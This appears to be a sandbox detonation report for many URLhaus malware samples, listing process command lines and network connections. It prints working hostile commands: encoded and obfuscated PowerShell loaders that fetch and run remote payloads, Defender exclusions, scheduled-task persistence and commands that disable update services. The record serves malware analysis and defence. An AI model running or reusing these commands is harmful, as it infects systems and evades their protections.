"C:\Users\Admin\Downloads\UrlHausFiles\three-daisies.exe"

C:\Users\Admin\Downloads\UrlHausFiles\SQL2019-SSEI-Dev.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SQL2019-SSEI-Dev.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\AppData\Local\Temp\3582-490\SQL2019-SSEI-Dev.exe

"C:\Users\Admin\AppData\Local\Temp\3582-490\SQL2019-SSEI-Dev.exe"

C:\Users\Admin\Downloads\UrlHausFiles\mimilove.exe

"C:\Users\Admin\Downloads\UrlHausFiles\mimilove.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\KUWAIT~1.EXE"

C:\Users\Admin\DOWNLO~1\URLHAU~1\KUWAIT~1.EXE

C:\Users\Admin\DOWNLO~1\URLHAU~1\KUWAIT~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\bp.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpE5C7.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpE5C7.tmp.bat

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\tmpE5C7.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpE5C7.tmp.bat

C:\Users\Admin\AppData\Local\Temp\is-M62BQ.tmp\KUWAIT~1.tmp

"C:\Users\Admin\AppData\Local\Temp\is-M62BQ.tmp\KUWAIT~1.tmp" /SL5="$3044C,3849412,851968,C:\Users\Admin\DOWNLO~1\URLHAU~1\KUWAIT~1.EXE"

C:\Users\Admin\DOWNLO~1\URLHAU~1\bp.exe

C:\Users\Admin\DOWNLO~1\URLHAU~1\bp.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\key.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ffcd460cc40,0x7ffcd460cc4c,0x7ffcd460cc58

C:\Users\Admin\DOWNLO~1\URLHAU~1\key.exe

C:\Users\Admin\DOWNLO~1\URLHAU~1\key.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 228 -ip 228

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\AA_v3.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 228 -s 364

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\CHROME~1.EXE"

C:\Users\Admin\DOWNLO~1\URLHAU~1\CHROME~1.EXE

C:\Users\Admin\DOWNLO~1\URLHAU~1\CHROME~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\F392TM~1.EXE"

C:\Users\Admin\AppData\Local\Temp\F392TM~1.EXE

C:\Users\Admin\AppData\Local\Temp\F392TM~1.EXE

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\Aa_v3.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2292,i,5061204446278887501,13120279352438544852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2272 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1760,i,5061204446278887501,13120279352438544852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2452 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1956,i,5061204446278887501,13120279352438544852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2480 /prefetch:8

C:\Users\Admin\DOWNLO~1\URLHAU~1\Aa_v3.exe

C:\Users\Admin\DOWNLO~1\URLHAU~1\Aa_v3.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\new.exe"

C:\Users\Admin\DOWNLO~1\URLHAU~1\new.exe

C:\Users\Admin\DOWNLO~1\URLHAU~1\new.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\Update.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\jeditor.exe"

C:\Users\Admin\DOWNLO~1\URLHAU~1\jeditor.exe

C:\Users\Admin\DOWNLO~1\URLHAU~1\jeditor.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3104,i,5061204446278887501,13120279352438544852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3184 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3112,i,5061204446278887501,13120279352438544852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3192 /prefetch:1

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network4726Man.cmd"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\chisel.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4480,i,5061204446278887501,13120279352438544852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4464 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c start C:\Users\Admin\AppData\Roaming\Network4726Man.cmd

C:\Users\Admin\DOWNLO~1\URLHAU~1\chisel.exe

C:\Users\Admin\DOWNLO~1\URLHAU~1\chisel.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\svchost.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\svchost.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\Beefy.exe"

C:\Users\Admin\DOWNLO~1\URLHAU~1\Beefy.exe

C:\Users\Admin\DOWNLO~1\URLHAU~1\Beefy.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\test26.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\DOWNLO~1\URLHAU~1\test26.exe

C:\Users\Admin\DOWNLO~1\URLHAU~1\test26.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "new" /tr "C:\Users\Admin\AppData\Roaming\new.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Roaming\Network4726Man.cmd

C:\Windows\SysWOW64\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn new /tr C:\Users\Admin\AppData\Roaming\new.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4780,i,5061204446278887501,13120279352438544852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4740 /prefetch:8

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\svchost.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\Taskmgr.exe"

C:\Windows\System32\cmd.exe

cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"

C:\Users\Admin\DOWNLO~1\URLHAU~1\Taskmgr.exe

C:\Users\Admin\DOWNLO~1\URLHAU~1\Taskmgr.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\XBLKPF~1.EXE"

C:\Users\Admin\DOWNLO~1\URLHAU~1\XBLKPF~1.EXE

C:\Users\Admin\DOWNLO~1\URLHAU~1\XBLKPF~1.EXE

C:\Windows\system32\whoami.exe

whoami

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\explorer.exe

explorer.exe

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\AppData\Local\kreon.exe

C:\Users\Admin\AppData\Local\kreon.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\1729TM~1.EXE"

C:\Users\Admin\AppData\Roaming\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Local\Temp\1729TM~1.EXE

C:\Users\Admin\AppData\Local\Temp\1729TM~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\file.exe"

C:\Users\Admin\DOWNLO~1\URLHAU~1\file.exe

C:\Users\Admin\DOWNLO~1\URLHAU~1\file.exe

C:\Users\Admin\AppData\Local\Temp\1729TM~1.EXE

C:\Users\Admin\AppData\Local\Temp\1729TM~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\kreon.exe"

C:\Users\Admin\AppData\Local\Temp\3582-490\kreon.exe

C:\Users\Admin\AppData\Local\Temp\3582-490\kreon.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')"

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffcc78e46f8,0x7ffcc78e4708,0x7ffcc78e4718

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\ipscan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')

C:\Users\Admin\DOWNLO~1\URLHAU~1\ipscan.exe

C:\Users\Admin\DOWNLO~1\URLHAU~1\ipscan.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,8970677178570723263,14954177359958588593,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network4726Man.cmd';$ddkL='TrhqWFanshqWFfohqWFrmhqWFFihqWFnalhqWFBlhqWFochqWFkhqWF'.Replace('hqWF', ''),'DDPxXecoDPxXmDPxXprDPxXessDPxX'.Replace('DPxX', ''),'MaysmqinysmqMysmqodysmqulysmqeysmq'.Replace('ysmq', ''),'ReiHEpadiHEpLiiHEpnesiHEp'.Replace('iHEp', ''),'GCqdUetCqdUCuCqdUrCqdUreCqdUntPCqdUrCqdUocCqdUesCqdUsCqdU'.Replace('CqdU', ''),'InAKLIvoAKLIkAKLIeAKLI'.Replace('AKLI', ''),'LoJqASadJqAS'.Replace('JqAS', ''),'CopyfqFyTyfqFoyfqF'.Replace('yfqF', ''),'FrvXuAomvXuABvXuAasvXuAe6vXuA4StvXuArvXuAinvXuAgvXuA'.Replace('vXuA', ''),'CxbdihxbdianxbdigxbdieExbdixtexbdinxbdisixbdioxbdinxbdi'.Replace('xbdi', ''),'EleVQPZmeVQPZntVQPZAtVQPZ'.Replace('VQPZ', ''),'CNQbureaNQbutNQbueDNQbuecrNQbuypNQbutorNQbu'.Replace('NQbu', ''),'EoUdqnoUdqtoUdqryoUdqPoUdqoioUdqnoUdqtoUdq'.Replace('oUdq', ''),'ScSRUplcSRUitcSRU'.Replace('cSRU', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($ddkL[4])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function rInUE($tsSXg){$AjjqB=[System.Security.Cryptography.Aes]::Create();$AjjqB.Mode=[System.Security.Cryptography.CipherMode]::CBC;$AjjqB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$AjjqB.Key=[System.Convert]::($ddkL[8])('N/y0OKPKBqPZJ+saNe6tgR7TAn10dih8XZ0HebZ+uEc=');$AjjqB.IV=[System.Convert]::($ddkL[8])('Ls3mytPz2eg1HzNec7G7VA==');$BtIij=$AjjqB.($ddkL[11])();$tfdFv=$BtIij.($ddkL[0])($tsSXg,0,$tsSXg.Length);$BtIij.Dispose();$AjjqB.Dispose();$tfdFv;}function UajxO($tsSXg){$coXbk=New-Object System.IO.MemoryStream(,$tsSXg);$PWDcH=New-Object System.IO.MemoryStream;$GMuYT=New-Object System.IO.Compression.GZipStream($coXbk,[IO.Compression.CompressionMode]::($ddkL[1]));$GMuYT.($ddkL[7])($PWDcH);$GMuYT.Dispose();$coXbk.Dispose();$PWDcH.Dispose();$PWDcH.ToArray();}$hqZyL=[System.IO.File]::($ddkL[3])([Console]::Title);$Hvhxu=UajxO (rInUE ([Convert]::($ddkL[8])([System.Linq.Enumerable]::($ddkL[10])($hqZyL, 5).Substring(2))));$LvPZo=UajxO (rInUE ([Convert]::($ddkL[8])([System.Linq.Enumerable]::($ddkL[10])($hqZyL, 6).Substring(2))));[System.Reflection.Assembly]::($ddkL[6])([byte[]]$LvPZo).($ddkL[12]).($ddkL[5])($null,$null);[System.Reflection.Assembly]::($ddkL[6])([byte[]]$Hvhxu).($ddkL[12]).($ddkL[5])($null,$null); "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Users\Admin\Downloads\UrlHausFiles\Video.scr

"C:\Users\Admin\Downloads\UrlHausFiles\Video.scr" /S

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\kreon.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,8970677178570723263,14954177359958588593,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2784 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,8970677178570723263,14954177359958588593,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3004 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,8970677178570723263,14954177359958588593,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,8970677178570723263,14954177359958588593,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3592 /prefetch:1

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\DOWNLO~1\URLHAU~1\file.exe" >> NUL

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ping 127.0.0.1 && del C:\Users\Admin\DOWNLO~1\URLHAU~1\file.exe >> NUL

C:\Windows\system32\cmd.exe

cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\kreon.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,8970677178570723263,14954177359958588593,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.147.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.66.49:443 urlhaus.abuse.ch tcp
N/A 127.0.0.1:55402 tcp
US 8.8.8.8:53 49.66.101.151.in-addr.arpa udp
US 8.8.8.8:53 3434.filelu.cloud udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 irp.cdn-website.com udp
US 8.8.8.8:53 kolobrownsalesye-fong.com udp
US 216.158.238.61:80 216.158.238.61 tcp
NL 95.169.201.100:18960 95.169.201.100 tcp
NL 95.169.201.100:18960 95.169.201.100 tcp
NL 95.169.201.100:18960 95.169.201.100 tcp
NL 95.169.201.100:18960 95.169.201.100 tcp
NL 95.169.201.100:18960 95.169.201.100 tcp
NL 95.169.201.100:18960 95.169.201.100 tcp
NL 95.169.201.100:18960 95.169.201.100 tcp
NL 95.169.201.100:18960 95.169.201.100 tcp
NL 95.169.201.100:18960 95.169.201.100 tcp
US 66.165.227.66:80 66.165.227.66 tcp
US 66.165.227.66:80 66.165.227.66 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 176.111.174.138:8000 176.111.174.138 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
HK 43.155.93.125:80 43.155.93.125 tcp
CN 39.102.210.162:8080 tcp
CN 39.102.210.162:8080 tcp
CN 39.102.210.162:8080 tcp
CN 39.102.210.162:8080 tcp
CN 39.102.210.162:8080 tcp
CN 123.60.37.61:9999 tcp
US 136.0.44.4:8000 136.0.44.4 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
TH 165.154.184.75:80 165.154.184.75 tcp
CN 125.33.228.48:8085 tcp
CN 125.33.228.48:8085 tcp
CN 125.33.228.48:8085 tcp
CN 123.130.204.103:8888 tcp
CN 123.130.204.103:8888 tcp
ES 81.42.249.132:1080 81.42.249.132 tcp
CN 183.30.204.105:81 tcp
CN 183.30.204.105:81 tcp
CN 183.30.204.105:81 tcp
CN 123.130.204.103:8888 tcp
ES 81.42.249.132:1080 81.42.249.132 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
DE 49.12.117.119:80 49.12.117.119 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
JP 121.1.252.90:80 121.1.252.90 tcp
CN 114.215.27.238:2324 tcp
CN 101.229.61.157:8072 tcp
CN 110.90.9.121:8072 tcp
CN 114.215.27.238:8072 tcp
TR 5.26.97.52:88 5.26.97.52 tcp
JP 122.31.166.101:80 122.31.166.101 tcp
CA 76.11.16.231:80 76.11.16.231 tcp
US 75.18.210.21:80 75.18.210.21 tcp
HK 219.77.72.53:80 219.77.72.53 tcp
CA 99.233.83.22:80 99.233.83.22 tcp
CN 110.40.250.173:2324 tcp
US 67.190.47.69:8081 67.190.47.69 tcp
CN 124.70.36.56:80 tcp
CN 121.235.184.125:9000 tcp
CN 61.183.16.127:14417 tcp
CN 58.208.14.94:88 tcp
TR 178.242.54.178:88 178.242.54.178 tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 cdn-downloads.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
